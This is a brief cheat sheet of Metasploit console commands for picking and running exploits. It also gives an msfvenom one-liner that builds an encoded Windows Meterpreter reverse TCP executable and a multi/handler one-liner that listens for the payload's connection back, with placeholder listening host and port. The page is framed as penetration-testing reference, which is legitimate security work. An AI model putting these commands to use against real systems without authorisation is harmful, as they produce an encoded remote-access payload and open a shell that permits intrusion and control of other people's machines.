The Metasploit Framework is a powerful tool for penetration testing and exploit development. Below are common commands used within the Metasploit console (msfconsole) and for payload generation (msfvenom).
This section covers the fundamental steps to select, configure, and run an exploit.
# To show all exploits that match a vulnerability
grep <vulnerability> show exploits
# To select an exploit to use
use <exploit>
# To see the current settings for a selected exploit
show options
# To see compatible payloads for a selected exploit
show payloads
# To set the payload for a selected exploit
set payload <payload>
# To set a specific option for a selected exploit
set <option> <value>
# To run the exploit
exploit
msfvenom is used to generate standalone payloads. This example creates a Windows Meterpreter reverse TCP payload.
# One-liner to create/generate a payload for Windows
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=<listening_host> LPORT=<listening_port> --bad-chars “\x00” --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/to/payload.exe
This command configures Metasploit to listen for incoming connections from a generated payload.
# One-liner to start a Meterpreter handler
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"